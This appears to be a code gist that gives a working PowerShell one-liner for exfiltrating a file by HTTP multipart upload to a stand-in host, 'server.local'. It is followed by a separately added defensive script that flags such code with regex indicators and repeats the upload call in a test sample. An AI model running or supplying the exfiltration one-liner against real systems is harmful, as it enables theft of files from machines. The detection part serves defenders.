Created
August 26, 2024 00:14
A PowerShell one-liner to exfiltrate a file via HTTP file upload.
```powershell
$F = Get-Item ".\filename"; $C = [System.IO.File]::ReadAllBytes($F.FullName); $R = [System.Net.WebRequest]::Create("http://server.local/"); $B=[System.Guid]::NewGuid().ToString(); $R.Method = "POST"; $R.ContentType = "multipart/form-data; boundary=$B"; $S = $R.GetRequestStream(); $E = [System.Text.Encoding]::ASCII; $S.Write($E.GetBytes("--$B`r`n"), 0, ("--$B`r`n").Length); $S.Write($E.GetBytes("Content-Disposition: form-data; name=`"file`"; filename=`"$($F.Name)`"`r`n"), 0, ("Content-Disposition: form-data; name=`"file`"; filename=`"$($F.Name)`"`r`n").Length); $S.Write($E.GetBytes("Content-Type: application/octet-stream`r`n`r`n"), 0, ("Content-Type: application/octet-stream`r`n`r`n").Length);
$S.Write($C, 0, $C.Length); $S.Write($E.GetBytes("`r`n--$B--`r`n"), 0, ("`r`n--$B--`r`n").Length); $S.Close(); $RE = $R.GetResponse();
```
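For defenders, an added example (not part of the gist or written by its author) that flags script text combining the three traits of the one-liner above: a raw file read, a .NET `WebRequest`, and a hand-built multipart POST body. The function name `Test-HttpUploadScriptBlock`, the indicator set, and the sample script blocks (including the `intranet.example` host) are assumptions constructed for illustration.

```powershell
# Added detection example; not code from the gist.
# Regex indicators for the building blocks the one-liner uses.
$Indicators = [ordered]@{
    FileRead      = '\[(System\.)?IO\.File\]::ReadAllBytes'
    WebRequest    = '\[(System\.)?Net\.WebRequest\]::Create'
    PostMethod    = '\.Method\s*=\s*["'']POST["'']'
    Multipart     = 'multipart/form-data'
    RequestStream = '\.GetRequestStream\('
}

function Test-HttpUploadScriptBlock {   # hypothetical helper name
    param([Parameter(Mandatory)][string]$ScriptText)

    # -match is case-insensitive, which matters because PowerShell ignores case
    $hits = @($Indicators.Keys | Where-Object { $ScriptText -match $Indicators[$_] })

    # Recover the destination only when it is a string literal in the call
    $destination = $null
    if ($ScriptText -match 'WebRequest\]::Create\(\s*["'']([^"'']+)["'']') {
        $destination = $Matches[1]
    }

    # Flag only the combination: file bytes read AND a request whose body is written by hand
    $suspicious = ($hits -contains 'FileRead') -and ($hits -contains 'WebRequest') -and
                  (($hits -contains 'Multipart') -or ($hits -contains 'RequestStream'))

    [pscustomobject]@{
        Suspicious  = $suspicious
        Indicators  = $hits -join ','
        Destination = $destination
    }
}

# Constructed sample script blocks, shaped like script block logging text (event ID 4104)
$samples = @(
    '$C = [System.IO.File]::ReadAllBytes($F.FullName); $R = [System.Net.WebRequest]::Create("http://server.local/"); $R.Method = "POST"; $R.ContentType = "multipart/form-data; boundary=$B"; $S = $R.GetRequestStream()',
    '$R = [System.Net.WebRequest]::Create("http://intranet.example/status"); $R.GetResponse()',
    'Get-ChildItem C:\Reports | Sort-Object Length'
)
$samples | ForEach-Object { Test-HttpUploadScriptBlock -ScriptText $_ } | Format-Table -AutoSize
```

Only the first sample is flagged; the second builds a request but reads no file and writes no body. A match is a triage lead rather than a verdict, since a script that is reformatted or assembles these strings at runtime will not hit the patterns.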